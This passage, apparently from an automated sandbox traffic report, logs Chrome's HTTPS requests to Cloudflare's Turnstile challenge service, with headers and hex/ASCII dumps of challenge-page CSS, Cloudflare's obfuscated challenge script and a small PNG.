                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                  Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                  Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                  Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                  2025-01-15 01:58:30 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                  Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.449761104.18.95.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:31 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902242d8f9180f6d&lang=auto HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:31 UTC331INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:31 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 118878
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902242dd1c4a8c05-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 01:58:31 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                  2025-01-15 01:58:31 UTC1369INData Raw: 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f
                                                                                  Data Ascii: if%20this%20problem%20persists.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_o
                                                                                  2025-01-15 01:58:31 UTC1369INData Raw: 2c 66 57 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 74 2c 67 75 2c 67 42 2c 66 54 2c 66 55 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 37 36 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 31 32 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 36 31 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 39 33 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 35 30 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 34 38 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 31 38 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74
                                                                                  Data Ascii: ,fW,gm,gn,go,gp,gt,gu,gB,fT,fU){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(976))/1*(-parseInt(gI(612))/2)+-parseInt(gI(1261))/3+-parseInt(gI(193))/4*(parseInt(gI(1250))/5)+parseInt(gI(848))/6*(-parseInt(gI(1418))/7)+-parseInt
                                                                                  2025-01-15 01:58:31 UTC1369INData Raw: 4a 53 4f 4e 5b 67 4d 28 31 34 36 39 29 5d 28 67 5b 67 4d 28 31 32 38 32 29 5d 29 2c 6d 3d 6b 5b 67 4d 28 31 33 39 38 29 5d 28 69 2c 67 4d 28 35 34 34 29 29 2c 6e 3d 65 4d 5b 67 4d 28 31 32 38 38 29 5d 5b 67 4d 28 32 32 33 29 5d 3f 6b 5b 67 4d 28 36 33 32 29 5d 28 27 68 2f 27 2b 65 4d 5b 67 4d 28 31 32 38 38 29 5d 5b 67 4d 28 32 32 33 29 5d 2c 27 2f 27 29 3a 27 27 2c 6f 3d 6b 5b 67 4d 28 36 33 32 29 5d 28 67 4d 28 36 37 33 29 2b 6e 2b 67 4d 28 35 37 39 29 2b 31 2b 67 4d 28 34 36 33 29 2b 65 4d 5b 67 4d 28 31 32 38 38 29 5d 5b 67 4d 28 31 34 33 34 29 5d 2c 27 2f 27 29 2b 65 4d 5b 67 4d 28 31 32 38 38 29 5d 2e 63 48 2b 27 2f 27 2b 65 4d 5b 67 4d 28 31 32 38 38 29 5d 5b 67 4d 28 37 31 34 29 5d 2c 73 3d 7b 7d 2c 73 5b 67 4d 28 31 33 31 39 29 5d 3d 65 4d 5b 67
                                                                                  Data Ascii: JSON[gM(1469)](g[gM(1282)]),m=k[gM(1398)](i,gM(544)),n=eM[gM(1288)][gM(223)]?k[gM(632)]('h/'+eM[gM(1288)][gM(223)],'/'):'',o=k[gM(632)](gM(673)+n+gM(579)+1+gM(463)+eM[gM(1288)][gM(1434)],'/')+eM[gM(1288)].cH+'/'+eM[gM(1288)][gM(714)],s={},s[gM(1319)]=eM[g
                                                                                  2025-01-15 01:58:31 UTC1369INData Raw: 3d 6a 2c 6c 3d 65 5b 67 50 28 39 38 35 29 5d 28 29 2c 6d 3d 6b 5b 67 50 28 38 37 38 29 5d 2c 6c 5b 67 50 28 32 36 38 29 5d 28 6d 29 3e 2d 31 29 3f 65 4d 5b 67 50 28 38 34 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 51 29 7b 67 51 3d 67 50 2c 65 4d 5b 67 51 28 31 35 35 37 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6e 3d 7b 7d 2c 6e 5b 67 50 28 32 39 30 29 5d 3d 65 2c 6e 5b 67 50 28 34 38 31 29 5d 3d 66 2c 6e 5b 67 50 28 38 30 31 29 5d 3d 67 2c 6e 5b 67 50 28 31 33 31 32 29 5d 3d 68 2c 6e 5b 67 50 28 31 32 38 32 29 5d 3d 69 2c 6f 3d 6e 2c 65 4d 5b 67 50 28 38 34 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 52 29 7b 67 52 3d 67 50 2c 65 4d 5b 67 52 28 31 32 36 38 29 5d 28 6f 2c 75 6e 64 65 66 69 6e 65 64 2c 67 52 28 31 34 36 30 29 29 7d 2c 31 30 29 2c 65 4d 5b 67 50 28
                                                                                  Data Ascii: =j,l=e[gP(985)](),m=k[gP(878)],l[gP(268)](m)>-1)?eM[gP(844)](function(gQ){gQ=gP,eM[gQ(1557)]()},1e3):(n={},n[gP(290)]=e,n[gP(481)]=f,n[gP(801)]=g,n[gP(1312)]=h,n[gP(1282)]=i,o=n,eM[gP(844)](function(gR){gR=gP,eM[gR(1268)](o,undefined,gR(1460))},10),eM[gP(
                                                                                  2025-01-15 01:58:31 UTC1369INData Raw: 29 5d 3d 66 6e 2c 66 53 5b 67 4a 28 33 31 37 29 5d 3d 66 79 2c 66 53 5b 67 4a 28 31 34 36 36 29 5d 3d 66 78 2c 66 53 5b 67 4a 28 31 35 36 34 29 5d 3d 66 77 2c 66 53 5b 67 4a 28 31 34 35 33 29 5d 3d 66 76 2c 66 53 5b 67 4a 28 31 34 37 31 29 5d 3d 66 67 2c 66 53 5b 67 4a 28 38 33 33 29 5d 3d 66 52 2c 66 53 5b 67 4a 28 31 30 33 37 29 5d 3d 66 6b 2c 66 53 5b 67 4a 28 32 32 31 29 5d 3d 66 68 2c 66 53 5b 67 4a 28 31 34 35 38 29 5d 3d 66 64 2c 66 53 5b 67 4a 28 38 30 30 29 5d 3d 66 63 2c 65 4d 5b 67 4a 28 32 35 33 29 5d 3d 66 53 2c 66 54 3d 5b 5d 2c 66 55 3d 30 3b 32 35 36 3e 66 55 3b 66 54 5b 66 55 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 31 33 34 30 29 5d 28 66 55 29 2c 66 55 2b 2b 29 3b 66 56 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 31 35 37 32 29 29 2c 66 57 3d 61
                                                                                  Data Ascii: )]=fn,fS[gJ(317)]=fy,fS[gJ(1466)]=fx,fS[gJ(1564)]=fw,fS[gJ(1453)]=fv,fS[gJ(1471)]=fg,fS[gJ(833)]=fR,fS[gJ(1037)]=fk,fS[gJ(221)]=fh,fS[gJ(1458)]=fd,fS[gJ(800)]=fc,eM[gJ(253)]=fS,fT=[],fU=0;256>fU;fT[fU]=String[gJ(1340)](fU),fU++);fV=(0,eval)(gJ(1572)),fW=a
                                                                                  2025-01-15 01:58:31 UTC1369INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 72 45 54 76 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 57 48 79 69 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 41 62 52 48 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 6b 66 76 4a 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 68 43 6e 47 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 45 6d 6b 53 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 68 68 63 73 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69
                                                                                  Data Ascii: :function(h,i){return i!=h},'rETvN':function(h,i){return h(i)},'WHyiP':function(h,i){return i&h},'AbRHN':function(h,i){return i&h},'kfvJK':function(h,i){return h(i)},'hCnGJ':function(h,i){return h-i},'EmkSI':function(h,i){return i!=h},'hhcsS':function(h,i
                                                                                  2025-01-15 01:58:31 UTC1369INData Raw: 28 4f 3d 7b 7d 2c 4f 5b 69 58 28 39 33 36 29 5d 3d 64 5b 69 58 28 33 35 33 29 5d 2c 4f 5b 69 58 28 31 35 31 30 29 5d 3d 78 5b 69 58 28 31 32 38 38 29 5d 5b 69 58 28 31 33 34 39 29 5d 2c 4f 5b 69 58 28 33 36 38 29 5d 3d 42 5b 69 58 28 31 32 38 38 29 5d 5b 69 58 28 37 35 34 29 5d 2c 4f 5b 69 58 28 35 31 38 29 5d 3d 64 5b 69 58 28 31 30 35 34 29 5d 2c 4f 5b 69 58 28 31 35 39 33 29 5d 3d 43 5b 69 58 28 31 32 38 38 29 5d 5b 69 58 28 32 31 32 29 5d 2c 4f 5b 69 58 28 31 37 38 29 5d 3d 44 5b 69 58 28 31 32 38 38 29 5d 5b 69 58 28 31 36 30 39 29 5d 2c 4f 5b 69 58 28 39 33 34 29 5d 3d 45 2c 65 5b 69 58 28 38 31 31 29 5d 5b 69 58 28 31 34 37 37 29 5d 28 4f 2c 27 2a 27 29 29 3b 65 6c 73 65 20 69 66 28 4b 3d 69 5b 69 58 28 31 33 31 34 29 5d 28 4a 29 2c 4f 62 6a 65 63
                                                                                  Data Ascii: (O={},O[iX(936)]=d[iX(353)],O[iX(1510)]=x[iX(1288)][iX(1349)],O[iX(368)]=B[iX(1288)][iX(754)],O[iX(518)]=d[iX(1054)],O[iX(1593)]=C[iX(1288)][iX(212)],O[iX(178)]=D[iX(1288)][iX(1609)],O[iX(934)]=E,e[iX(811)][iX(1477)](O,'*'));else if(K=i[iX(1314)](J),Objec
                                                                                  2025-01-15 01:58:31 UTC1369INData Raw: 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 69 58 28 37 31 31 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 69 58 28 39 38 38 29 5d 28 48 3c 3c 31 2e 37 37 2c 64 5b 69 58 28 36 35 39 29 5d 28 4d 2c 31 29 29 2c 49 3d 3d 64 5b 69 58 28 31 35 35 36 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 69 58 28 35 32 39 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 4d 7c 48 3c 3c 31 2e 37 32 2c 64 5b 69 58 28 31 31 32 36 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 69 58 28 35 32 39 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 69 58 28 37 31 31 29 5d 28
                                                                                  Data Ascii: )),H=0):I++,s++);for(M=C[iX(711)](0),s=0;8>s;H=d[iX(988)](H<<1.77,d[iX(659)](M,1)),I==d[iX(1556)](j,1)?(I=0,G[iX(529)](o(H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;s<F;H=M|H<<1.72,d[iX(1126)](I,j-1)?(I=0,G[iX(529)](o(H)),H=0):I++,M=0,s++);for(M=C[iX(711)](
                                                                                  2025-01-15 01:58:31 UTC1369INData Raw: 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 6a 30 28 31 31 37 37 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 64 5b 6a 30 28 31 35 36 30 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 6a 30 28 31 34 33 38 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 46 2a 28 30 3c 4c 3f 31 3a 30 29 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4d 2c 44 5b 6a 30 28 35 32 39 29 5d 28 4d 29 3b 3b 29 7b 69 66 28 49 3e 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 6a 30 28 31 31 37 37 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47
                                                                                  Data Ascii: (J=0,K=Math[j0(1177)](2,16),F=1;K!=F;L=d[j0(1560)](G,H),H>>=1,d[j0(1438)](0,H)&&(H=j,G=o(I++)),J|=F*(0<L?1:0),F<<=1);M=e(J);break;case 2:return''}for(E=s[3]=M,D[j0(529)](M);;){if(I>i)return'';for(J=0,K=Math[j0(1177)](2,C),F=1;K!=F;L=H&G,H>>=1,0==H&&(H=j,G


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.449762104.18.95.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:31 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:31 UTC240INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:31 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  cache-control: max-age=2629800, public
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902242dd69eac354-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 01:58:31 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.449765104.18.95.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:31 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:31 UTC240INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:31 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  cache-control: max-age=2629800, public
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902242e12cc81879-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 01:58:31 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.449766104.18.95.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:31 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902242d8f9180f6d&lang=auto HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:32 UTC331INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:32 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 114689
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902242e27a901a3c-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
